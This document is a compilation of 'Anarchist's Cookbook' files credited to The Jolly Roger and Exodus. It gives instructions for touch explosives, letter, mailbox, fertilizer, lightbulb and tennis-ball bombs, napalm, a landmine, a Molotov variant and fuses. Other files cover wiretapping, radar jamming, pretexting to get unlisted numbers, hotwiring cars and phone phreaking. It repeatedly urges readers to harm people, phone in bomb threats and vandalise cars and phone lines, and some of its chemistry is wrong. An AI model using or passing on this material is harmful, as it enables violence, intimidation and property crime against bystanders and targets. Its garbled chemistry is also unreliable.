Touch Explosives                         by the Jolly Roger

This is sort of a mild explosive, but it can be quite dangerous in 
large quantities. To make touch explosive (such as that found in a 
snap-n-pop, but more powerful), use this recipe:

- Mix iodine crystals into ammonia until the iodine crystals will 
not dissolve into the ammonia anymore. Pour off the excess ammonia 
and dry out the crystals on a baking sheet the same way as you 
dried the thermite (in other words, just let it sit overnight!).

- Be careful now because these crystals are now your touch 
explosive. Carefully wrap a bunch in paper (I mean carefully! 
Friction sets 'em off!) and throw them around.. pretty loud, huh?
They are fun to put on someone's chair. Add a small fish sinker to 
them and they can be thrown a long distance (good for crowds, 
football games, concerts, etc.) Have fun!  -Jolly Roger-



Letter Bombs                            by The Jolly Roger

- You will first have to make a mild version of thermite. Use my 
recipe, but substitute iron fillings for rust. 

- Mix the iron with aluminum fillings in a ratio of 75% aluminum 
to 25% iron. This mixture will burn violently in a closed space 
(such as an envelope). This bring us to our next ingredient...

- Go to the post office and buy an insulated (padded) envelope. 
You know, the type that is double layered... Seperate the layers 
and place the mild thermite in the main section, where the letter 
would go. Then place magnesium powder in the outer layer. There is 
your bomb!!

- Now to light it... this is the tricky part and hard to explain. 
Just keep experimenting until you get something that works. The 
fuse is just that touch explosive I have told you about in another 
one of my anarchy files. You might want to wrap it like a long 
cigarette and then place it at the top of the envelope in the 
outer layer (on top of the powdered magnesium). When the touch 
explosive is torn or even squeezed hard it will ignite the 
powdered magnesium (sort of a flash light) and then it will burn 
the mild thermite. If the thermite didn't blow up, it would at 
least burn the fuck out of your enemy (it does wonders on human 
flesh!). 

NOW that is REVENGE!                 -Jolly Roger-



Paint Bombs                          by The Jolly Roger

To make a pain bomb you simply need a metal pain can with a 
refastenable lid, a nice bright color paint (green, pink, purple, 
or some gross color is perfect!), and a quantity of dry ice. Place 
the paint in the can and then drop the dry ice in. Quicky place 
the top on and then run like hell! With some testing you can time 
this to a science. It depends on the ratio of dry ice to paint to 
the size of the can to how full it is. If you are really pissed 
off at someone, you could place it on their doorstep, knock on the 
door, and then run!! Paint will fly all over the place HAHAHA!!
                                        -Jolly Roger-




Ways to send a car to Hell            by The Jolly Roger

There are 1001 ways to destroy a car but I am going to cover only
the ones that are the most fun (for you), the most destructive
(for them), and the hardest to trace (for the cops).

- Place thermite on the hood, light it, and watch it burn all the
way through the pavement!

- Tape a CO2 bomb to the hood, axel, gas tank, wheel, muffler,
etc.)

- Put a tampon, dirt, sugar (this one is good!), a ping pong ball,
or just about anything that will dissolve in the gas tank.
Plastic deforms and dilutes into gas.  The final result is much
harder to inject into the engine, possibly causing valve replacement.


- Put potatoes, rocks, banannas, or anything that will fit, into
the tailpipe. Use a broom handle to stuff 'em up into the
tailpipe.

- Put a long rag into the gas tank and light it...

- Steal a key, copy it, replace it, and then steal the stereo.

- Break into the car. Cut a thin metal ruler into a shape like
this:
             ÚÄÄ¿       (Revised ill. 4.14)
             ³  ³
             ³  ³
             ³  ³
             ³  ³
             ³ ÚÙ
             ³ À¿
             ÀÄÄÙ

Slide it into the outside window and keep pulling it back up until
you catch the lock cable which should unlock the door. This device
is also called a SLIM JIM. Now get the stereo, equalizer, radar
detector, etc. Now destroy the inside. (A sharp knife does wonders
on the seats!)

Have Fun!                                    -= Exodus =-
Do ya hate school?                  by The Jolly Roger

- One of my favorites for getting out of a class or two is to call 
in a bomb threat. Tell 'em that it is in a locker. Then they have 
to check them all, whilst you can slip away for an hour or two. 
You can even place a fake bomb (in any locker but YOURS!). They 
might cancel school for a week while they investigate (of course, 
you will probably have to make it up in the summer...).
 
- Get some pure potassium or pure sodium, put it in a capsule, and 
flush it down the toilet (smells awful! Stinks up the whole school!).

- Use a smoke grenade in the hallway.

- Steal the computer passwords & keys. Or steal the 80 column cards
 inside if they are (gag) IBM.

- Make friends with student assistants and have them change your
grades when the teachers hand in their bubble sheets for the report
cards.
 
- Spit your gum out on the carpet in the library or whatever and 
grind it into the carpet. Watch the janitors cry!

- Draw on lockers or spraypaint on the building that the principal 
is a fascist. 

- Stick a potato in the tailpipe of the principal's car.

-Get a virus from The Black Gate BBS, and infect their computers!  
Most likely they use WordPerfect, Excel, and shit like that.


- USE YOUR IMAGINATION!                   -= Exodus =-



Phone related vandalism                     by the Jolly Roger

If you live where there are underground lines then you will be 
able to ruin someone's phone life very easily. All you must do is 
go to their house and find the green junction box that interfaces 
their line (and possibly some others in the neighborhood) with the 
major lines. These can be found just about anywhere but they are 
usually underneath the nearest phone pole. Take a socket wrench 
and loosen the nut on the right. Then just take clippers or a 
sledge hammer or a bomb and destroy the insides and pull up their 
phone cable. Now cut it into segments so it can't be fixed but 
must be replaced (There is a week's worth of work for 'em!!)
Another place to phuck with lines is in new developments.  When 
houses/apartments/condos are still in the plywood and dirt stage, 
the lines are run into junxion boxes.  When the crew goes home for 
the day, plan your attack.  Just destroy the shit out of the box, 
then replace the cover.  Watch em' go nuts as they try to figure
out where the line broke in the walls <DUH!> !

                                                  -= Exodus =-


Highway radar jamming                       by The Jolly Roger

Most drivers wanting to make better time on the open road will 
invest in one of those expensive radar detectors. However, this 
device will not work against a gun type radar unit in which the 
radar signal is not present until the cop has your car in his 
sights and pulls the trigger. Then it is TOO LATE for you to slow 
down. A better method is to continuously jam any signal with a 
radar signal of your own. I have tested this idea with the 
cooperation of a local cop and found that his unit reads random 
numbers when my car approached him. It is suprisingly easy to make 
a low power radar transmitter. A nifty little semiconductor called 
a Gunn Diode will generate microwaves when supplied with the 5 to 
10 volt DC and enclosed in the correct size cavity (resonater). An 
8 to 3 terminal regulator can be used to get this voltage from a 
car's 12v system. However, the correct construction and tuning of 
the cavity is difficult without good microwave measurement 
equipment. Police radars commonly operate on the K band at 22 ghz. 
Or more often on the X band at 10.525 ghz. most microwave intruder 
alarms and motion detectors (mounted over automatic doors in 
supermarkets & banks, etc.) contain a Gunn type 
transmitter/receiver combination that transmits about 10 kilowatts 
at 10.525 ghz. These units work perfectly as jammers. If you 
cannot get one locally, write to Microwave Associates in 
Burlington, Massachusettes and ask them for info on 'Gunnplexers' 
for ham radio use. When you get the unit it may be mounted in a 
plastic box on the dash or in a weather-proff enclosure behind the 
PLASTIC grille. Switch on the power when on an open highway. The 
unit will not jam radar to the side or behind the car so don't go 
speeding past the radar trap. An interesting phenomena you will 
notice is that the drivers who are in front of you who are using 
detectors will hit their brakes as you approach large metal signs 
and bridges. Your signal is bouncing off of these objects and 
triggering their radar detectors!       HAVE FUN!
                                       -Jolly Roger-

P.S. If you are interested in this sort of thing, get a copy of 
POPULAR COMMUNICATIONS. The ads in there tell you where you can 
get all kinds of info on all kinds of neat equipment for all kinds 
of neat things!

                                              -= Exodus =- '94

Smoke Bombs                         by the Jolly Roger

Here is the recipe for one helluva smoke bomb!

4 parts sugar
6 parts potassium nitrate (Salt Peter)

Heat this mixture over a LOW flame until it melts, stirring well. 
Pour it into a future container and, before it solidifies, imbed a 
few matches into the mixture to use as fuses. One pound of this 
stuff will fill up a whole block with thick, white smoke!

                                   -= Exodus =-


Mail Box Bombs                                 by the Jolly Roger

(1) Two litre bottle of chlorine (must contain sodium hypochlorate)

    Small amount of sugar

    Small amount of water


Mix all three of these in equal amounts to fill about 1/10 of the 
bottle. Screw on the lid and place in a mailbox. It's hard to 
believe that such a small explosion will literally rip the mailbox 
in half and send it 20 feet into the air! Be careful doing this, 
though, because if you are caught, it is not up to the person 
whose mailbox you blew up to press charges. It is up to the city.
                                    - Exodus -



The easiest way to hotwire cars                 by the Jolly Roger

Get in the car. Look under the dash. If it enclosed, forget it 
unless you want to cut through it. If you do, do it near the 
ignition. Once you get behind or near the ignition look for two 
red wires. In older cars red was the standard color, if not, look 
for two matched pairs. When you find them, cross them and take 
off!                                


                                              -Exodus-



How to make Napalm                              by the Jolly Roger

- Pour some gas into an old bowl, or some kind of container.

- Get some styrofoam and put it in the gas, until the gas won't 
eat anymore. You should have a sticky syrup.

- Put it on the end of something (don't touch it!!). The unused 
stuff lasts a long time!
                                       -Exodus-




How to make a fertilizer bomb                       by Jolly Roger

Ingredients:

- Newspaper
- Fertilizer (the chemical kind, GREEN THUMB or ORCHO)
- Cotton
- Diesel fuel

Make a pouch out of the newspaper and put some fertilizer in it. 
Then put cotton on top. Soak the cotton with fuel. Then light and 
run like you have never ran before! This blows up 500 square feet 
so don't do it in an alley!!               -Exodus-

 


Tennis Ball Bombs                               by The Jolly Roger

Ingredients:

- Strike anywhere matches
- A tennis ball
- A nice sharp knife
- Duct tape

Break a ton of matchheads off. Then cut a SMALL hole in the tennis 
ball. Stuff all of the matchheads into the ball, until you can't 
fit any more in. Then tape over it with duct tape. Make sure it is 
real nice and tight! Then, when you see a geek walking down the 
street, give it a good throw. He will have a blast!!
                                         - Exodus -



Diskette Bombs                                  by the Jolly Roger

You need:

 - A disk
 - Scissors
 - White or blue kitchen matches (they MUST be these colors!)
 - Clear nail polish

- Carefully open up the diskette (3.5" disks are best for this!)

- Remove the cotton covering from the inside.

- Scrape a lot of match powder into a bowl (use a wooden scraper, 
metal might spark the matchpowder!)

- After you have a lot, spread it evenly on the disk.

- Using the nail polish, spread it over the match mixture

- Let it dry

- Carefully put the diskette back together and use the nail polish 
to seal it shut on the inside (where it came apart).

- When that disk is in a drive, the drive head attempts to read 
the disk, which causes a small fire (ENOUGH HEAT TO MELT THE DISK 
DRIVE AND FUCK THE HEAD UP!!). ahahahahaha! Let the fuckhead try 
and fix THAT!!!                        

                                            -= Exodus =-



Unlisted Phone Numbers                          by The Jolly Roger

There are a couple of different ways of doing this. Let's see if 
this one will help: Every city has one or more offices dedicated 
to assigning numbers to the telephone wire pairs. These offices 
are called DPAC offices and are available to service reps who are 
installing or repairing phones. To get the DPAC number, a service 
rep would call the customer service number for billing information 
in the town that the number is located in that he is trying to get 
the unlisted number of. (Got that?) The conversation would go 
something like this: "Hi, Amarillo, this is Joe from Anytown 
business office, I need the DPAC number for the south side of 
town." This info is usually passed out with no problems, so... if 
the first person you call doesn't have it, try another. REMEMBER, 
no one has ANY IDEA who the hell you are when you are talking on 
the phone, so you can be anyone you damn well please! (heheheheh!) 
When you call the DPAC number, just tell them that you need a 
listing for either the address that you have, or the name. DPAC 
DOES NOT SHOW WHETHER THE NUMBER IS LISTED OR UNLISTED!! Also, if 
you're going to make a habit of chasing numbers down, you might 
want to check into geting a criss-cross directory, which lists 
phone numbers by their addresses. It costs a couple-a-hundred bux, 
but it is well worth it if you have to chase more than one or two 
numbers down!

                                                -= Exodus =- 


Fuses                             by The Jolly Roger

You would be surprised how many files are out there that use what 
falls under the category of a "fuse." They assume that you just 
have a few lying around, or know where to get them. Well, in some 
parts of the country, fuses are extremely hard to come by... so 
this file tells you how to make your own. Both fuses presented 
here are fairly simple to make, and are fairly reliable.

SLOW BURNING FUSE
~~~~~~~~~~~~~~~~~ (approx. 2 inches per minute)

Materials needed:

 - Cotton string or 3 shoelaces
 - Potassium Nitrate or Potassium Chlorate
 - Granulated sugar

Procedure:

 - Wash the cotton string or showlaces in HOT soapy water, then 
rinse with fresh water

 - Mix the following together in a glass bowl:
   1 part potassium nitrate or potassium chlorate
   1 part granulated sugar
   2 parts hot water

 - Soak strings or shoelaces in this solution

 - Twist/braid 3 strands together and allow them to dry
 
 - Check the burn rate to see how long it actually takes!!

FAST BURNING FUSE
~~~~~~~~~~~~~~~~~ (40 inches per minute)

Materials needed:

 -Soft cotton string
 -fine black powder (empty a few shotgun shells!)
 -shallow dish or pan

Procedure:

 - moisten powder to form a paste

 - twist/braid 3 strands of cotton together

 - rub paste into string and allow to dry

 - Check the burn rate!!!




                      Compiled by -= Exodus =- How to make Potassium Nitrate                   by The Jolly Roger

Potassium Nitrate is an ingredient in making fuses, among other 
things. Here is how you make it:

Materials needed:

 -3.5 gallons of nitrate bearing earth or other material
 -1/2 cup of wood ashes
 -Bucket or other similar container about 4-5 gallons in volume
 -2 pieces of finely woven cloth, each a bit bigger than the 
  bottom of the bucket
 -Shallow dish or pan at least as large in diameter as the bucket
 -Shallow, heat resistant container
 -2 gallons of water
 -Something to punch holes in the bottom of the bucket
 -1 gallon of any type of alcohol
 -A heat source
 -Paper & tape

Procedure:

 - Punch holes on the inside bottom of the bucket, so that the 
metal is"puckered" outward from the bottom

 - Spread cloth over the holes from the bottom

 - Place wood ashes on the cloth. Spread it out so that it covers 
the entire cloth and has about the same thickness.

 - Place 2nd cloth on top of the wood ashes

 - Place the dirt or other material in the bucket

 - Place the bucket over the shallow container. NOTE: It may need 
support on the bottom so that the holes on the bottom are not 
blocked.

 - Boil water and pour it over the earth very slowly. Do NOT pour 
it all at once, as this will clog the filter on the bottom.

 - Allow water to run through holes into the shallow dish on the 
bottom.

 - Be sure that the water goes through ALL of the earth!

 - Allow water in dish to cool for an hour or so

 - Carefully drain the liquid in the dish away, and discard the 
sludge in the bottom

 - Boil this liquid over a fire for at least two hours. Small 
grains of salt will form - scoop these out with the paper as they 
form

 - When the liquid has boiled down to 1/2 its original volume let 
it sit

 - After 1/2 hour, add equal volume of the alcohol; when this 
mixture is poured through paper, small white crystals appear. This 
is the posassium nitrate.

Purification:

 - Redissolve crystals in small amount of boiling water

 - Remove any crystals that appear

 - Pour through improvised filter then heat concentrated solution 
to dryness.

 - Spread out crystals and allow to dry



                     Compiled by -= Exodus =-
--LIGHTBULB BOMBS 2  4.14                               -= Exodus =-

     An automatic reaction to walking into a dark room is to turn on the
light. This can be fatal, if a lightbulb bomb has been placed in the overhead
light socket.  A lightbulb bomb is surprisingly easy to make.  It also comes
with its own initiator and electric ignition system.  On some lightbulbs, the
lightbulb glass can be removed from the metal base by heating the base of a
lightbulb in a gas flame, such as that of a blowtorch or gas stove.  This must
be done carefully, since the inside of a lightbulb is a vacuum.  When the glue
gets hot enough, the glass bulb can be pulled off the metal base.  On other
bulbs, it is necessary to heat the glass directly with a blowtorch or
oxy-acetylene torch. In either case, once the bulb and/or base has cooled down
to room temperature or lower, the bulb can be filled with an explosive
material, such as black powder.  If the glass was removed from the metal base,
it must be glued back on to the base with epoxy.  If a hole was put in the
bulb, a piece of duct tape is sufficient to hold the explosive in the in the
bulb.  Then, after making sure that the socket has no power by checking with a
working lightbulb, all that need be done is to screw the lightbulb bomb into
the socket.  Such a device has been used by terrorists or assassins with much
success, since few people would search the room for a bomb without first
turning on the light.
Under water igniters                            by The Jolly Roger

Materials needed:

 -Pack of 10 silicon diodes (available at Radio Shack. you will 
  know you got the right ones if they are very, very small glass 
  objects!)
 -Pack of matches
 -1 candle

Procedure:

 - Light the candle and allow a pool of molten wax to form in the 
top.

 - Take a single match and hold the glass part of a single diode 
against the head. Bend the diode pins around the matchhead so that 
one wraps in an upward direction and thensticks out to the side. 
Do the same with the other wire, but in a downward direction. The 
diodes should now be hugging the matchhead, but its wires MUST NOT 
TOUCH EACH OTHER!

 - Dip the matchhead in wax to give it a water-proof coat. These 
work underwater

 - repeat to make as many as you want

How to use them:

When these little dudes are hooked across a 6v battery, the diode 
reaches what is called breakdown voltage. When most electrical 
components reach this voltage, they usually produce great amounts 
of heat and light, while quickly melting into a little blob. This 
heat is enough to ignite a matchhead. These are recommended for 
use underwater, where most other igniters refuse to work. ENJOY!
                                          -Exodus-



Home-brew blast cannon                          by The Jolly Roger

Materials needed:

 -1 plastic drain pipe, 3 feet long, at least 3 1/2 inches in 
  diameter
 -1 smaller plastic pipe, about 6 inches long, 2 inches in 
  diameter
 -1 large lighter, with fluid refills (this gobbles it up!)
 -1 pipe cap to fit the large pipe, 1 pipe cap to fit the small 
  pipe
 -5 feet of bellwire
 -1 SPST rocker switch
 -16v polaroid pot-a-pulse battery
 -15v relay (get this at Radio Shack)
 -Electrical Tape
 -One free afternoon

Procedure:

 - Cut the bell wire into three equal pieces, and strip the ends

 - Cut a hole in the side of the large pipe, the same diameter as 
the small pipe. Thread the hole and one end of the small pipe. 
they should screw together easily.

 - Take a piece of scrap metal, and bend it into an "L" shape, 
then attach it to the level on the lighter:

 /------------------------gas switch is here
 V
 /------
!lighter!!<---metal lever
!!!
!!

Now, every time you pull the 'trigger' gas should flow freely from 
the lighter. You may need to enlarge the 'gas port' on your 
lighter, if you wish to be able to fire more rapidly.

 - Connect two wires to the two posts on the switch

 - Cut two holes in the side of the smaller tube, one for the 
switch on the bottom, and one for the metal piece on the top. 
Then, mount the switch in the bottom, running the wires up and out 
of the top.

 - Mount the lighter/trigger in the top. Now the switch should 
rock easily, and the trigger should cause the lighter to pour out 
gas. Re-screw the smaller tube into the larger one, hold down the 
trigger a bit, let it go, and throw a match in there. If all goes 
well, you should hear a nice big 'THUD!'

 - Get a hold of the relay, and take off the top.

1---------------
v/
 2--------------/<--- the center object is the metal finger inside
                3                                       the relay
 cc-------------/
 oo----------------4
 ii
 ll----------------5

Connect (1) to one of the wires coming from the switch. Connect 
(2) to (4), and connect (5) to one side of the battery. Connect 
the remaining wire from the switch to the other side of the 
battery. Now you should be able to get the relay to make a little 
'buzzing' sound when you flip the switch and you should see some 
tiny little sparks.

 - Now, carefully mount the relay on the inside of the large pipe, 
towards the back. Screw on the smaller pipe, tape the battery to 
the side of the cannon barrel (yes, but looks aren't everything!)

 - You should now be able to let a little gas into the barrel and 
set it off by flipping the switch.

 - Put the cap on the back end of the large pipe VERY SECURELY. 
You are now ready for the first trial-run!

To Test:

Put something very, very large into the barrel, just so that it 
fits 'just right'. Now, find a strong guy (the recoil will 
probably knock you on your ass if you aren't careful!). Put on a 
shoulderpad, earmuffs, and possibly some other protective clothing 
(trust the Jolly Roger! You are going to need it!). Hold the 
trigger down for 30 seconds, hold on tight, and hit the switch. 
With luck and the proper adjustments, you should be able to put a 
frozed orange through 1/4 or plywood at 25 feet.

Have fun!                                  -Exodus-



Chemical Equivalency list                       by the Jolly Roger

Acacia..................................................Gum Arabic
Acetic Acid................................................Vinegar
Aluminum Oxide..............................................Alumia
Aluminum Potassium Sulphate...................................Alum
Aluminum Sulfate..............................................Alum
Ammonium Carbonate.......................................Hartshorn
Ammonium Hydroxide.........................................Ammonia
Ammonium Nitrate........................................Salt Peter
Ammonium Oleate.......................................Ammonia Soap
Amylacetate............................................Bananna Oil
Barium Sulfide...........................................Black Ash
Carbon Carbinate.............................................Chalk
Carbontetrachloride.................................Cleaning Fluid
Calcium Hypochloride..............................Bleaching Powder
Calcium Oxide.................................................Lime
Calcium Sulfate...................................Plaster of Paris
Carbonic Acid..............................................Seltzer
Cetyltrimethylammoniumbromide........................Ammonium Salt
Ethylinedichloride.....................................Dutch Fluid
Ferric Oxide.............................................Iron Rust
Furfuraldehyde............................................Bran Oil
Glucose.................................................Corn Syrup
Graphite...............................................Pencil Lead
Hydrochloric Acid....................................Muriatic Acid
Hydrogen Peroxide.........................................Peroxide
Lead Acetate.........................................Sugar of Lead
Lead Tero-oxide...........................................Red Lead
Magnesium Silicate............................................Talc
Magnesium Sulfate.......................................Epsom Salt
Methylsalicylate..................................Winter Green Oil
Naphthalene..............................................Mothballs
Phenol...............................................Carbolic Acid
Potassium Bicarbonate..............................Cream of Tarter
Potassium Chromium Sulfate..............................Chromealum
Potassium Nitrate.......................................Salt Peter
Sodium Oxide..................................................Sand
Sodium Bicarbonate.....................................Baking Soda
Sodium Borate................................................Borax
Sodium Carbonate......................................Washing Soda
Sodium Chloride...............................................Salt
Sodium Hydroxide...............................................Lye
Sodium Silicate..............................................Glass
Sodium Sulfate......................................Glauber's Salt
Sodium Thiosulfate.............................Photographer's Hypo
Sulfuric Acid.........................................Battery Acid
Sucrose.................................................Cane Sugar
Zinc Chloride.......................................Tinner's Fluid
Zinc Sulfate.........................................White Vitriol


Brought to you in the Anarchist's CookBook 4.14..

                            -= Exodus =-

Phone Taps                                      by The Jolly Roger

Here is some info on phone taps. In this file is a schematic for a 
simple wiretap & instructions for hooking up a small tape recorder 
control relay to the phone line.

First, I will discuss taps a little. There are many different 
types of taps. there are transmitters, wired taps, and induction 
taps to name a few. Wired and wireless transmitters must be 
physically connected to the line before they will do any good. 
Once a wireless tap is connected to the line,it can transmit all 
conversations over a limited reception range. The phones in the 
house can even be modifies to pick up conversations in the room 
and transmit them too! These taps are usually powered off of the 
phone line, but can have an external power source. You can get more
information on these taps by getting an issue of Popular
Communications and reading through the ads. Wired taps, on the 
other hand, need no power source, but a wire must be run from the 
line to the listener or to a transmitter. There are obvious 
advantages of wireless taps over wired ones. There is one type of
wireless tap that looks like a normal telephone mike. All you have 
to do is replace the original mike with thisand itwill transmit 
all conversations! There is also an exotic type of wired tap known 
as the 'Infinity Transmitter' or 'Harmonica Bug'. In order to hook 
one of these, it must be installed inside the phone. When someone 
calls the tapped phone & *before* it rings,blows a whistle over 
the line, the transmitter picks up the phone via a relay. The mike 
on the phone is activated so that the caller can hear all of the 
conversations in the room. There is a sweep tone test at     
415/BUG-1111 which can be used to detect one of these taps. If one 
of these is on your line & the test # sends the correct tone, you 
will hear a click. Induction taps have one big advantage over taps 
that must be physically wired to the phone. They do not have to be 
touching the phone in order to pick up the conversation. They work 
on the same principle as the little suction-cup tape recorder 
mikes that you can get at Radio Shack. Induction mikes can be 
hooked up to a transmitter or be wired.

Here is an example of industrial espionage using the phone:
 A salesman walks into an office & makes a phone call. He fakes 
the conversation, but when he hangs up he slips some foam rubber 
cubes into the cradle. The called party can still hear all 
conversations in the room. When someone picks up the phone, the 
cubes fall away unnoticed.
 
A tap can also be used on a phone to overhear what your modem is 
doing when you are wardialing, hacking, or just plain calling a 
bbs (like the White Ruins! Denver, Colorado! 55 megs online! 
Atari! Macintosh! Amiga! Ibm! CALL IT! 303-972-8566! By the way, i 
did this ad without the sysops consent or knowledge!). 

Here is the schematic:
-------)!----)!(------------->
             )!(
  Cap ^      )!(
             )!(
             )!(
             )!(
     ^^^^^---)!(------------->
       ^  100K
       !
       ! <Input

The 100K pot is used for volume. It should be on its highest 
(least resistance) setting if you hook a speaker across the 
output. but it should be set on its highest resistance for a tape 
recorder or amplifier. You may find it necessary to add another
10 - 40K. The capacitor should be around .47 MFD. It's only 
purpose is to prevent the relay in the phone from tripping & 
thinking that you have the phone off of the hook. the audio output 
transformer is available at Radio Shack. (part # 273-138E for 
input). The red & the white wires go to the output device. You may 
want to experiment with the transformer for the best output. 
Hooking up a tape recorder relay is easy. Just hook one of the phone 
wires (usually red) to the the end of one of the relay & the ther 
end just loop around. This bypasses it. It should look like this:

------^^^^^^^^^------------
      ---------
      RELAY^^
(part #275-004 from Radio Shack works fine)

If you think that you line is tapped, the first thing to do is to 
physically inspect the line yourself ESPECIALLY the phones. You 
can get mike replacements with bug detectors built in. However, I 
would not trust them too much. It is too easy to get a wrong 
reading.

For more info:

BUGS AND ELECTRONIC SURVEILANCE from Desert Publications
HOW TO AVOID ELECTRONIC EAVESDROPPING & PRIVACY INVASION. I do not 
remember who this one is from... you might want to try Paladin 
Press.

                                          -Exodus-
 


How to make a landmine                          by The Jolly Roger

First, you need to get a pushbutton switch. Take the wires of it 
and connect one to a nine volt battery connector and the other to 
a solar igniter (used for launching model rockets). A very thin 
piece of stereo wire will usually do the trick if you are 
desperate, but I recommend the igniter. Connect the other wire of 
the nine-volt battery to one end of the switch. Connect a wire 
from the switch to the other lead on the solar igniter. 

       switch-----------battery
         \                  /
          \                /
           \              /
            \            /
            solar  igniter 
                  |
                  | 
                  |
              explosive

Now connect the explosive (pipe bomb, m-80, CO2 bomb, etc.) to the 
igniter by attaching the fuse to the igniter (seal it with scotch 
tape). Now dig a hole; not too deep but enough to cover all of the 
materials. Think about what direction your enemy will be coming from
and plant the switch, but leave the button visible (not TOO 
visible!). Plant the explosive about 3-5 feet away from the switch 
because there will be a delay in the explosion that depends on how 
short your wick is, and, if a homemade wick is being used, its 
burning speed. But if you get it right... and your enemy is close 
enough......... BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM! hahahaha

                                          -EXODUS-



A different kind of Molitoff Cocktail               by the Jolly Roger

Here is how you do it:

 - Get a coke bottle & fill it with gasoline about half full

 - Cram a piece of cloth into the neck of it nice and tight

 - Get a chlorine tablet and stuff it in there. You are going to have
to force it because the tablets are bigger than the opening of the 
bottle. 

 - Now find a suitable victim and wing it in their direction. When it 
hits the pavement or any surface hard enough to break it, and the chlorine
and gasoline mix..... BOOM!!!!!!
Have fun!                                    -Exodus-


Phone Systems Tutorial                          by The Jolly Roger

To start off, we will discuss the dialing procedures for domestic 
as well as international dialing. We will also take a look at the 
telephone numbering plan.

North American Numbering Plan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In North America, the telephone numbering plan is as follows:

A) a 3 digit Numbering Plan Area (NPA) code , ie, area code
B) a 7 digit telephone # consisting of a 3 digit Central Office 
(CO) code plus a 4 digit station #

These 10 digits are called the network address or destination 
code. It is in the format of:
 
      Area Code         Telephone #
      ---------         -----------

         N*X             NXX-XXXX

Where: N = a digit from 2 to 9
       * = the digit 0 or 1
       X = a digit from 0 to 9

Area Codes
~~~~~~~~~~

Check your telephone book or the seperate listing of area codes 
found on many bbs's. Here are the special area codes (SAC's):

   510 - TWX (USA)
   610 - TWX (Canada)
   700 - New Service
   710 - TWX (USA)
   800 - WATS
   810 - TWX (USA)
   900 - DIAL-IT Services
   910 - TWX (USA)

The other area codes never cross state lines, therefore each state 
must have at least one exclusive NPA code. When a community is 
split by a state line, the CO #'s are often interchangeable (ie, 
you can dial the same number from two different area codes).

TWX (Telex II) consists of 5 teletype-writer area codes. They are 
owned by Western Union. These SAC's may only be reached via other 
TWX machines. These run at 110 baud (last I checked! They are most 
likely faster now!). Besides the TWX #'s, these machines are 
routed to normal telephone #'s. TWX machines always respond with 
an answerback. For example, WU's FYI TWX # is (910) 279-5956. The 
answerback for this service is "WU FYI MAWA".

If you don't want to but a TWX machine, you can still send TWX 
messages using Easylink [800/325-4112]. However you are gonna have 
to hack your way onto this one!

700:

700 is currently used by AT&T as a call forwarding service. It is 
targeted towards salesmen on the run. To understand how this 
works, I'll explain it with an example. Let's say Joe Q. Salespig 
works for AT&T security and he is on the run chasing a phreak 
around the country who royally screwed up an important COSMOS 
system. Let's say that Joe's 700 # is (700) 382-5968. Everytime 
Joe goes to a new hotel (or most likely SLEAZY MOTEL), he dials a 
special 700 #, enters a code, and the number where he is staying. 
Now, if his boss received some important info, all he would do is 
dial (700) 382-5968 and it would ring wherever Joe last progammed 
it to. Neat, huh?

800:

This SAC is one of my favourites since it allows for toll free 
calls. INWARD WATS (INWATS), or Inward Wide Area 
Telecommunications Service is the 800 #'s that we are all familiar 
with. 800 #'s are set up in service areas or bands. There are 6 of 
these. Band 6 is the largest and you can call a band 6 # from 
anywhere in the US except the state where the call is terminated 
(that is why most companies have one 800 number for the countery 
and then another one for their state.) Band 5 includes the 48 
contiguous states. All the way down to band 1 which includes only 
the states contiguous to that one. Therefore, less people can 
reach a band 1 INWATS # than a band 6 #.

Intrastate INWATS #'s (ie, you can call it from only 1 state) 
always have a 2 as the last digit in the exchange (ie, 800-NX2-
XXXX). The NXX on 800 #'s represent the area where the business is 
located. For example, a # beginning with 800-431 would terminate 
at a NY CO.

800 #'s always end up in a hunt series in a CO. This means that it 
tries the first # allocated to the company for their 800 lines; if 
this is busy, it will try the next #, etc. You must have a minimum 
of 2 lines for each 800 #. For example, Travelnet uses a hunt 
series. If you dial (800) 521-8400, it will first try the # 
associated with 8400; if it is busy it will go to the next 
available port, etc. INWATS customers are billed by the number of 
hours of calls made to their #.

OUTWATS (OUTWARD WATS): OUTWATS are for making outgoing calls 
only. Largecompanies use OUTWATS since they receive bulk-rate 
discounts. Since OUTWATS numbers cannot have incoming calls, they 
are in the format of:

   (800) *XXX-XXXX

Where * is the digit 0 or 1 (or it may even be designated by a 
letter) which cannot be dialed unless you box the call. The *XX 
identifies the type of service and the areas that the company can 
call.

Remember:

 INWATS + OUTWATS = WATS EXTENDER

900:

This DIAL-IT SAC is a nationwide dial-it service. It is use for 
taking television polls and other stuff. The first minute 
currently costs an outrageous 50-85 cents and each additional 
minute costs 35-85 cents. Hell takes in a lot of revenue this way!

Dial (900) 555-1212 to find out what is currently on this service.

CO CODES
~~~~~~~~

These identify the switching office where the call is to be 
routed. The following CO codes are reserved nationwide:

   555 - directory assistance
   844 - time. These are now in!
   936 - weather the 976 exchange
   950 - future services
   958 - plant test
   959 - plant test
   970 - plant test (temporary)
   976 - DIAL-IT services

Also, the 3 digit ANI & ringback #'s are regarded as plant test 
and are thus reserved. These numbers vary from area to area. 

You cannot dial a 0 or 1 as the first digit of the exchange code 
(unless using a blue box!). This is due to the fact that these 
exchanges (000-199) contains all sorts of interesting shit such as 
conference #'s, operators, test #'s, etc.

950:

Here are the services that are currently used by the 950 exchange:

   1000 - SPC
   1022 - MCI Execunet
   1033 - US Telephone
   1044 - Allnet
   1066 - Lexitel
   1088 - SBS Skyline

These SCC's (Specialized Common Carriers) are free from fortress 
phones! Also, the 950 exchange will probably be phased out with 
the introduction of Equal Access

Plant Tests:

These include ANI, Ringback, and other various tests.

976:

Dial 976-1000 to see what is currently on the service. Also, many 
bbs's have listings of these numbers.

N11 codes:
----------
Bell is trying to phase out some of these, but they still exist in 
most areas. 

  011 - international dialing prefix
  211 - coin refund operator
  411 - directory assistance
  611 - repair service
  811 - business office
  911 - EMERGENCY

International Dialing
~~~~~~~~~~~~~~~~~~~~~

With International Dialing, the world has been divided into 9 
numbering zones. To make an international call, you must first 
dial: International Prefix + Country code + National #

In North America, the international dialing prefix is 011 for 
station-to-station calls. If you can dial International #'s 
directly in your area then you have International Direct Distance 
Dialing (IDDD).

The country code, which varies from 1 to 3 digits, always has the 
world numbering zone as the first digit. For example, the country 
code for the United Kingdom is 44, thus it is in world numbering 
zone 4. Some boards may contain a complete listing of other 
country codes, but here I give you a few:

   1 - North America (US, Canada, etc.)
  20 - Egypt
 258 - Mozambique
  34 - Spain
  49 - Germany
